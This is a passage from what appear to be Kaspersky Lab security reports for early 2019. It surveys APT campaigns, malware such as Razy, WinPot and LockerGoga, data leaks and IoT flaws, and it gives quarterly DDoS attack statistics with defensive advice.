No direct evidence exists as to the origins of GreyEnergy, but the links between GreyEnergy and Zebrocy suggest the groups are related. Kaspersky Lab researchers have detailed how both groups shared the same C2 (command-and-control) server infrastructure for a certain period of time and how both targeted the same organization almost simultaneously, which more or less confirms the relationship between the two.

Chafer uses Remexi malware to spy on Iran-based diplomatic agencies

Throughout autumn 2018, we analyzed a long-standing (and still active at that time) cyber-espionage campaign that primarily targeted foreign diplomatic entities in Iran. The attackers used an improved version of the Remexi malware, previously associated with an APT threat actor that Symantec calls Chafer. This group has been observed since at least 2015, but based on things such as compilation time-stamps, and C2 registration, it’s possible that the group has been active for even longer. Traditionally, Chafer has focused on targets inside Iran, although its interests clearly include other countries in the Middle East.

The attackers rely heavily on Microsoft technologies on both client and server sides. The Trojan uses standard Windows utilities such as the Microsoft BITS (Background Intelligent Transfer Service) “bitsadmin.exe” to receive commands and exfiltrate data. This data includes keystrokes, screenshots, and browser-related data such as cookies and history, decrypted where possible. The C2 is based on IIS using .ASP technology to handle the victims’ HTTP requests.

New zero-day vulnerability exploited by APT threat actors

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered recently using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on February 22, who confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on March 12, 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. Just as with CVE-2018-8589, we believe that this exploit is being used by several threat actors, including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT actor that we discovered only recently.

Lazarus continues to target crypto-currency exchanges

The Lazarus APT group is well-known for targeting financial organizations. In the middle of 2018, we published our report on ‘Operation AppleJeus‘, highlighting the threat actor’s focus on crypto-currency exchanges, using a fake company with a backdoored product aimed at crypto-currency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers.

The Lazarus group continues to update its TTPs (Tactics, Techniques and Procedures) to help it fly under the radar. We would urge organizations involved in the booming crypto-currency or technological startup industry to exercise extra caution when dealing with new third parties or installing software. It’s best to check new software with an anti-virus program or at least use popular free virus-scanning services such as VirusTotal. You should never set ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. If you need to try out new applications, it’s better to do so offline or on an isolated network virtual machine which you can erase with a few clicks. For more details on this and other research, you can subscribe to our APT intelligence reports.

Under the [Shadow]Hammer

In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers added a backdoor to the utility and then distributed it to users through official channels. ASUS has a wide install base, making this an attractive target for APT threat actors. The compromised version of the utility was distributed to a large number of people between June and November 2018. Our telemetry shows that 57,000 Kaspersky Lab customers downloaded and installed it, although we believe the real scale of the problem is much bigger, possibly affecting over a million users worldwide.

The goal of the attack was to surgically target an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses in the Trojanized samples, which identifies the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist which target different MAC addresses. You can check if your MAC address is on the target list here.

Other malware news Razy Trojan steals crypto-currency

While many browser extensions make our lives easier, some are altogether more dangerous, bombarding us with advertising or collecting information about our activities. Some are even designed to steal money. We recently reported the Razy Trojan, malware that installs a malicious browser extension on the victim’s computer or infects an already installed extension. To do so, it disables the integrity check for installed extensions and automatic updates for the targeted browser. The Trojan works with Google Chrome, Mozilla Firefox and Yandex browsers, though it has different infection scenarios for each browser type. Razy spreads via advertising blocks on websites and is distributed from free file-hosting services under the guise of legitimate software. Razy serves several purposes, mostly related to the theft of crypto-currency. Its main tool, the script ‘main.js’, is capable of searching for addresses of crypto-currency wallets on websites and replacing them with the attacker’s wallet addresses, spoofing images of QR codes pointing to wallets, modifying the web pages of crypto-currency exchanges and spoofing Google and Yandex search results.

Turning ATMs into slot machines

‘Jackpotting’ refers to the fraudulent methods used by criminals to obtain cash from ATMs. One recent example is the WinPot malware. The malware is notable because the criminals designed the user interface to resemble a slot machine.

However, unlike the machines in a casino, an ATM infected with WinPot always pays out – to the criminals. The malware window displays the denomination of banknotes for each cassette, so that the money mule operating the malware just needs to select the cassette with the most money in it and press ‘Spin’. The ‘Scan’ button can be used to recount the notes. The authors also include an emergency ‘Stop’ button, to allow the mule to cut short the pay out so as not to arouse suspicion.

There are several versions of the malware, and while their core functionality is essentially the same, there are some differences. For example, some versions will only dispense cash for a limited period of time and then they deactivate themselves. As with Cutlet Maker, WinPot is available on the Darknet for between $500 and $1,000, depending on the version.

To block attacks of this kind, we recommend that banks adopt device control and whitelisting. The former will block attempts to implant malware in the ATM using a USB device, while the latter will prevent execution of unauthorized software on the ATM. Kaspersky Embedded Systems Security can be used to secure ATMs.

Pirate Matryoshka

Using torrent trackers to spread malware is a well-known practice: cybercriminals disguise it as popular software, computer games, media files and other sought-after content. Earlier this year we detected one such campaign, when The Pirate Bay (TPB) tracker filled up with harmful files used to distribute malware under the guise of cracked copies for paid programs. The tracker contained malicious torrents created from dozens of different accounts, including those registered on TBP for quite some time. Instead of the expected software, the downloaded file was a Trojan, Pirate Matryoshka, whose basic logic was implemented by SetupFactory installers.

During the initial stage, the installer decrypts another SetupFactory installer to display a phishing web page. This page opens directly in the installation window and requests the user’s TBP account credentials, supposedly to continue the process. The second downloaded component is also a SetupFactory installer, used to decrypt and run four PE files in sequence. The second and fourth of these files are downloaders for the InstallCapital and MegaDowl file partner programs (which Kaspersky Lab classifies as adware). These usually find their way on to people’s computers through file sharing sites. Besides downloading the required content, their goal is to install additional software while carefully hiding the option to cancel.

The other two files are auto-clickers written in Visual Basic that are required to prevent the user from canceling the installation of additional software (in which case the cybercriminals would go away empty-handed). The auto-clickers are run before the installers: when the installer windows are detected, they check the boxes and click the buttons needed to give the user’s consent to install the unnecessary software.

Pirate Matryoshka results in the victim being flooded with unwanted programs. The owners of file partner programs often do not track the programs offered in their downloaders: our research shows that one in five files offered by partner installers is malicious, including pBot, Razy and others.

Mirai now used to target enterprise devices

Researchers from Palo Alto Networks’ Unit 42 recently reported a new variant of Mirai, the infamous IoT botnet. This malware is best known for its use in a massive DDoS attack on the servers of DNS provider Dyn, in 2016. The botnet is now equipped with a much wider range of exploits, which makes it even more dangerous and allows it to spread faster.

More troubling is the fact that the new strain is targeting not only its usual victims – routers, IP cameras, and other ‘smart’ things – but also enterprise IoT devices. This is no surprise since the Mirai source code was leaked some time ago, allowing any attacker with sufficient programming skills to use it. This explains why this botnet features highly in our report, ‘DDoS attacks in Q4 2018‘; and the fact that, in our report, ‘New trends in the world of IoT threats‘, Mirai is responsible for 21% of all IoT infections.

It is possible that future waves of Mirai infections might even include industrial IoT devices.

To reduce the risk of Mirai infection, we recommend that you install patches and firmware updates as soon as they become available, monitor traffic coming from each device for abnormalities, change default passwords and enforce an effective password policy for staff and re-boot any device that is behaving strangely (this will remove the malware from the device, but will not, on its own, prevent re-infection. To help companies protect themselves against the latest IoT-related threats we have released a new intelligence data feed for IoT-related threats.

‘Collection #1’ and other data leaks

On January 17, security researcher Troy Hunt reported a leak of more than 773 million email addresses and 21 million unique passwords. The data, dubbed ‘Collection #1’, was originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this ‘new’ leak. The new data dump, dubbed ‘Collection #2-5’, was discovered by researchers at the Hasso Plattner Institute in Potsdam.

In February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, were put up for sale on Dream Market, accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies was posted to the same market place. Then in March, the hacker behind the earlier data dumps posted stolen data from a further six companies.

One of the particularly worrying aspects of these leaks is the fact that not all of the companies affected had previously reported the data breaches.

The impact on a company affected by a data breach goes beyond the loss of data. It includes the costs of investigating the breach, closing any security loopholes and maintaining business continuity. On top of that, a company’s reputation can be affected, especially if it becomes clear that the company failed to take adequate steps to secure the personal data of its customers.

The impact on customers can also be dramatic, especially if they use the same login credentials to access other online services. You can find our advice on how to mitigate the impact of a data breach here.

Social engineering

In our threat predictions for 2019, we described social engineering as the most successful infection vector ever and indicated why we thought it would remain so. The key to its success lies in sparking the curiosity of potential victims. Massive data leaks, such as the ones discussed above, help attackers to fine-tune their approach, making it more successful. Phishers will latch on to any topic that they think will pique the interest of their victims. We saw this recently in a campaign that hooked into events in Venezuela.

On February 10, Juan Guaido made a public call for volunteers to join a new movement called ‘Voluntarios por Venezuela’ (Volunteers for Venezuela), to help international organizations deliver humanitarian aid to the country. The original website asks volunteers to provide their full name, personal ID, cell phone number, and whether they have a medical degree, a car, or a smartphone, and also their location. The volunteers sign up and then receive instructions on how to help.

Just a few days after the legitimate site appeared, an almost identical website appeared. Both the legitimate and fake sites used SSL from Let’s Encrypt. The scariest aspect was that these two different domains, with different owners, were resolved within Venezuela to the same IP address, belonging to the fake domain owner. So it didn’t matter if a volunteer opened the legitimate domain name or the fake one – in the end their personal information was injected into a fake site.

In this scenario, where DNS servers are being manipulated, we would strongly recommend using public DNS servers such as Google DNS servers (8.8.8.8 and 8.8.4.4) or CloudFlare and APNIC DNS servers (1.1.1.1 and 1.0.0.1). We also recommend using VPN connections without a third-party DNS.

LockerGoga ransomware attacks

Ransomware continues to be a problem for consumers and businesses alike, notwithstanding a relative decline in numbers in the last two years. In 2018, we blocked 765,538 crypto-ransomware attacks on computers protected by Kaspersky Lab products, of which around 220,000 included corporate customers.

The most recent to hit the headlines is LockerGoga, which recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom note asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins.

However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords, and removing their ability to even log back in to the system. In such cases, the victims may not even get to see the ransom note.

19-year-old bug in WinRAR

Recently, researchers from Check Point discovered a long-standing vulnerability in the popular WinRAR utility – used by around 500 million people worldwide. This path traversal zero-day vulnerability (CVE-2018-20250) enables attackers to specify arbitrary destinations during file extraction of ‘ACE’-formatted files, regardless of user input.

This vulnerability has been fixed in the latest version of WinRAR (5.70), but since WinRAR itself does not contain an auto-update feature, it’s probable that many existing users will continue to run out-of-date versions.

The internet of secure, and not so secure, things

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. These include household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys, as well as cars, medical devices, CCTV cameras and parking meters. This offers a broad attack surface for anyone looking to take advantage of security weaknesses – for whatever purpose. Sadly, all too often we see reports of vulnerabilities in smart devices that could leave both consumers and organizations open to attack.

In February, at MWC19, researchers from our ICS CERT presented a report on the security of artificial limbs developed by Motorica. They looked at three aspects: firmware, the handling of data and the security of data in the cloud.

On the plus side, they found no vulnerabilities in the firmware of the prosthetic limbs themselves, or in the handling of data – since data flows one way only, from the limb to the cloud, it’s not possible to hack the device and take control of it remotely. However, they did find flaws in the development of the cloud infrastructure that could allow an attacker to gain access to data from the smart limb.

Werner Schober, a researcher at SEC Consult took an intimate look at the security of a sex toy. The device, designed to connect to an Android or iOS smartphone using Bluetooth, is controlled through a special app, either locally or remotely. On top of this, the app features a fully-fledged social network with group chats, photo galleries, friend-lists and more. The researcher was able to access the data of all users of the device, including usernames, passwords, chats, images and videos. Even worse, he was able to find a way to control the devices of other users. There was no mechanism for updating the firmware. However, he was able to find interfaces on the device that the manufacturer had used for debugging purposes and forgotten to close.

Researchers at Pen Test Partners recently discovered a flaw that exposes the sensitive data of children wearing GPS tracking watches, including their name, parents’ details and real-time location information. This was because of a secure privilege escalation vulnerability. The system failed to validate that the user had the appropriate permission to obtain admin control, so that an attacker with access to the watch’s credentials could change the permissions at the backend, exposing access to the account information and data stored on the watch.

It’s essential that vendors consider security when products are being designed. However, it’s also vital that consumers consider security before buying any connected device. This includes disabling functions that you don’t need – or even asking yourself if you need a connected version of the device at all. It also means looking online for information about any vulnerabilities that may have been reported and checking to see if it’s possible to update the firmware on the device. Finally, it’s important to change the default password and replace it with a unique, complex password. You can use the free Kaspersky IoT Scanner to check your Wi-Fi network and tell you if the devices connected to it are safe.

DDoS attacks in Q1 2019

21 Květen, 2019 - 12:00

News overview

The start of the year saw the appearance of various new tools in the arsenal of DDoS-attack masterminds. In early February, for instance, the new botnet Cayosin, assembled from elements of Qbot, Mirai, and other publicly available malware, swam into view. Cybersecurity experts were intrigued less by the mosaic structure and frequent updating of its set of exploited vulnerabilities than by the fact that it was advertised (as a DDoS service) not on the dark web, but through YouTube. What’s more, it is up for sale on Instagram (botnetters are clearly making the most of the opportunities afforded by social media). In tracing the cybercriminals’ accounts, the researchers stumbled upon other malware and botnets as well, including the already discovered Yowai.

Mid-March turned up another find in the shape of a new version of Mirai, geared towards attacking business devices. The malware is now able to “botnetize” not only access points, routers, and network cameras, but wireless presentation and digital signage systems, too.

Despite all this, the number of observed high-profile attacks using new and not-so-new botnets was not that high. At the end of winter, the University of Albany (UAlbany) in the US came under assault: during the February 5 – March 1 period, 17 attacks were made on it, downing the university servers for at least five minutes. Data belonging to students and staff was not affected, but some services were unavailable; the head of IT security at UAlbany believes that the university was specifically targeted.

In early February, the website of the National Union of Journalists of the Philippines was also hit. The site was disabled for several hours by a series of powerful attacks, peaking at 468 GB/s of traffic. The attack was part of a widespread campaign against various news resources. The targets believe themselves to be the victims of political pressure on alternative sources of information.

Also in mid-March, Facebook encountered serious problems with its services when Facebook and Instagram users were unable to log into their accounts. Many observers consider the incident to be DDoS-related. However, Facebook itself rejects this version of events, meaning that the real cause can only be guessed at.

The lack of news about serious DDoS attacks coincided with a rise in the number of reports of major police operations against attack organizers, accompanied by arrests and charges.

The fight to bring down resources used for DDoS attacks continues: in early January, the US Department of Justice seized 15 Internet domains from which a series of DDoS attacks was launched last December. According to DoJ documents, those domains were used to carry out attacks on government systems, ISPs, universities, financial institutions, and gaming platforms worldwide.

Later that same month, a US court handed down a 10-year jail term to a Massachusetts hacker for conducting DDoS attacks against two health facilities. Also in January, a hacker-for-hire was arrested in Britain for having incapacitated mobile networks in Liberia and Germany (at the peak of his criminal career in 2015, he took the whole of Liberia offline). Although his “work history” is far longer than that, no other charges were brought.

The shockwaves from last year’s operation to close down Webstresser.org — one of the most notorious sites providing DDoS attack services — continue to spread. Cyber police decided to go after not just the attack organizers, but the customers as well. At the end of January, Europol announced the arrest of more than 250 users in Britain and the Netherlands. Instead of prison, one of the convicted cybercriminals will receive an alternative punishment under the Dutch Hack_Right program, aimed at rehabilitating young hackers arrested for the first time. Other sources report that an investigation is underway into all 150,000 Webstresser clients resident in 20 different countries.

Yet despite the law enforcement efforts, DDoS attacks remain a real threat to business. As a Neustar International Security Council survey of 200 senior technical staff members of large companies revealed, firms today consider DDoS attacks to be a serious problem: 52% of security services have already faced them, and 75% are concerned about the issue.

Quarter trends

Last quarter, we made two predictions about trends in the DDoS attack market: first, that the market overall would contract; second, that demand for long-term “smart” attacks, in particular HTTP flooding, would grow.

The first did not happen: Kaspersky DDoS Protection statistics show that all DDoS attack indicators increased last quarter. The total number of attacks climbed by 84%, and the number of sustained (over 60 minutes) DDoS sessions precisely doubled. The average duration increased by 4.21 times, while the segment of extremely long attacks posted a massive 487% growth.

This forces a reassessment of the assumption made in last year’s Q3 and Q4 reports that the decrease in DDoS activity is linked to cybercriminals switching to the more reliable and profitable cryptocurrency mining. Clearly, this hypothesis is at least partially wrong.

There is another, more likely explanation: over the last six months of the previous year, we have been observing less the redistribution of botnet capacity for other purposes and more the emergence of a market vacuum. Most likely, the supply deficit was linked to the clamping down on DDoS attacks, the closure of sites selling related services, and the arrest of some major players over the past year. Now it seems the vacuum is being filled: such explosive growth in the indicators is almost certainly due to the appearance of new suppliers and clients of DDoS services. It will be interesting to observe how this trend develops in Q2. Will the indicators continue to rise, or will the market settle at the current level?

The second prediction (growing demand for smart application-level attacks) was more accurate: the share of long, harder-to-organize attacks is still growing, both qualitatively and quantitatively. We see no reason why this trend should not continue throughout Q2.

Statistics Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q1 2019.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary
  • In terms of the geographical distribution of attacks, China remains out in front. Having nearly surrendered top spot at the end of 2018, it consolidated its positions in Q1 2019.
  • The geographical distribution of targets roughly mirrors the geographical distribution of attacks: the Top 3 were again China (59.85%), the US (21.28%), and Hong Kong (4.21%).
  • Both geographic Top 10s saw relatively little reshuffling compared to previous quarters. There was no more sudden growth observed in botnet activity in unexpected places.
  • DDoS attacks peaked in the second half of March; the quietest period was January.
  • The most dangerous day of the week for DDoS attacks was Saturday, while Sunday remains the calmest.
  • The maximum attack duration decreased by more than a day against the previous quarter, although the percentage share of sustained DDoS sessions continued to rise and amounted to 21.34% (versus 16.66% in Q4 2018).
  • The share of SYN flooding increased to 84%, bringing down the share of UDP and TCP flood, while the share of HTTP and ICMP attacks rose to 3.3% and 0.6%, respectively.
  • The share of Linux botnets decreased slightly, but still remains predominant (95.71%).
  • Most botnet C&C servers are still located in the US (34.10%), with the Netherlands in second place (12.72%), and Russia in third (10.40%). It is notable that the once perennial leader, South Korea, returned to the Top 10, albeit in last place (2.31%).
Attack geography

China remains the leader by number of attacks. It even returned to its previous level after a drop in previous quarters: its share rose from 50.43% to 67.89%. In second place came the US, although its share was reduced from 24.90% to 17.17%. Third place belonged to Hong Kong, up from seventh, increasing its share from 1.84% to 4.81%.

Interestingly, except for China and Hong Kong, all other countries’ shares decreased. This did not prevent the US from retaining second position; meanwhile, Australia, having taken bronze at the end of 2018, dropped to last place, down 4 p.p. (from 4.57% to 0.56%).

Among other significant changes, it is worth noting Britain, which fell from fifth to seventh place having shed 1.52 p.p. (from 2.18% to 0.66%), as well as Canada and Saudi Arabia. Each of the latter two lost around 1 p.p., but that did not stop Canada (0.86%) climbing from sixth to fourth, while Saudi Arabia (0.58%) dropped down a rung towards the foot of the table.

Brazil, meanwhile, dropped out of the Top 10 altogether, making way for Singapore, which came straight in at number 5 with 0.82% of attacks (tellingly, its share too was down on the previous quarter, albeit very slightly).

South Korea, which previously juggled second and third place with the US, remains outside the Top 10 (accounting for 0.30% of attacks). However, although the Top 10 still looks slightly odd to us, there was no repeat of the out-of-the-blue changes observed in the past three quarters.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by country, Q4 2018 and Q1 2019 (download)

The results of the geographical distribution of targets are consistent with the geographical distribution of the attacks themselves: China is once again in first position (its share up from 43.26% to 59.85%), with the US in second (down from 29.14% to 21.28%) and Hong Kong in third (climbing from 1.76% to 4.21%).

Saudi Arabia dropped from fifth to sixth place, losing slightly more than 1 p.p. (its share decreased from 2.23% to 1.08%). Canada shed roughly the same amount (from 2.21% to 1.30%), yet rose from sixth to fourth place, while Britain’s more significant loss (from 2.73% to 1.18%) pushed it from fourth to fifth.

In the meantime, the Top 10 said goodbye to Australia and Brazil, which last quarter ranked third and eighth, respectively. They were replaced by Singapore, whose insignificant growth (from 0.72% to 0.94%) was enough to claim eighth place, and Poland, which saw its share nudge up from 0.33% to 0.90%, in ninth position. As before, the Top 10 was rounded off by Germany (0.77%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of unique DDoS-attack targets by country, Q4 2018 and Q1 2019 (download)

Dynamics of the number of DDoS attacks

In the last quarter, the most DDoS activity was observed in March, especially the second half. The highest peak was on March 16 (699 attacks). And a significant surge occurred on January 17, when we registered 532 attacks. Early January was calm as expected, with no prominent spikes or troughs; however, the quietest day of all was February 5 with a total of 51 attacks.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Dynamics of the number of DDoS attacks in Q1 2019 (download)

As for the distribution by day of the week, activity last quarter clearly shifted to the weekend: Saturday was the most intensive day (accounting for 16.65% of attacks), with Friday in second place (15.39%). Sundays saw a relative lull — just 11.41% of attacks. Recall that in late 2018 Thursday had the largest share of DDoS attacks (15.74%), with Sunday again the most peaceful.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by day of the week, Q4 2018 and Q1 2019 (download)

Duration and types of DDoS attacks

In Q1, the share of sustained attacks almost doubled — from 0.11% to 0.21%. However, instead of lasting almost 14 days (329 hours) as in Q4 2018, the longest attack this quarter was just slightly more than 12 days (289 hours).

On top of that, the share of all attacks lasting more than five hours increased significantly: whereas at the end of 2018 it was 16.66%, now the figure stands at 21.34%. If this segment is sliced into smaller sections, as seen on the graph, most categories of long-duration attacks experienced a rise, while only the proportion of attacks lasting 100–139 hours decreased slightly (from 0.14% to 0.11%). Accordingly, the share of short-duration attacks fell by almost 5 p.p. to 78.66%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by duration (hours), Q4 2018 and Q1 2019 (download)

As in previous years, SYN flooding made up the lion’s share of junk traffic in Q1. Compared to Q4 2018, its share was even greater, climbing to 84.1%. Naturally, such a large rise (up from 58.2%, more than 20 p.p.) had an impact on the shares of other types of traffic.

For instance, UDP flooding, despite holding on to second spot, had a Q1 share of just 8.9% (down from 31.1%). The share of TCP flooding, previously ranked third, also dropped (from 8.4% to 3.1%), only good enough for fourth place behind HTTP flooding (which grew by 1.1 p.p. to 3.3%). ICMP traffic finished last as per tradition, despite its share rising from 0.1% to 0.6%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by type, Q1 2019 (download)

Linux botnets still vastly outnumber their Windows-based counterparts, although in Q1 2019 the gap closed slightly: Linux botnets now make up not 97.11% but 95.71% of the total, while the respective share of Windows botnets went up by approximately 1.5 p.p. to 4.29%. However, this is not because Windows devices are becoming more popular, but due to the declining number of C&C servers of the Mirai bot and its Darkai clone. As a result, the number of attacks by these bots decreased by three and seven times, respectively.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Ratio of Windows/Linux botnet attacks, Q4 2018 and Q1 2019 (download)

Botnet distribution geography

The leading country by number of botnets on its soil remains the US (34.10%). The Netherlands rose from third in Q4 2018 to second place (12.72%). Third place this time went to Russia (10.40%), which climbed all the way up from seventh. China (7.51%) rose from the foot of the ranking to fourth, just missing out on a return to the Top 3.

Greece and Germany, meanwhile, slipped out of the Top 10. They made room for Vietnam (4.05%) in seventh, and South Korea (2.31%). The latter only managed tenth place, despite previously having led this category for quite some time.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of botnet C&C servers by country, Q1 2019 (download)

Conclusion

In the previous three quarters, we saw some unexpected arrivals in several Top 10s — countries with no major track record as a source of DDoS threats suddenly asserted themselves. But Q1 2019 held no particular surprises, save for countries such as Saudi Arabia, the Netherlands, and Romania maintaining a high level of DDoS activity; in other words, their appearance in the Top 10s cannot be put down to random deviations. Meanwhile, cybercriminals previously based in South Korea seem to be in no hurry to reappear there. It is possible that we are witnessing the establishment of a new distribution of botnets by country.

Also worth noting is the significant decline in the botnet activity of Darkai, one of the Mirai clones: the number of attacks with its assistance decreased by seven times. Mirai itself was also hit hard, suffering a threefold drop in activity. This factor, among others, goes someway to explaining the certain decline in the number and duration of DDoS attacks.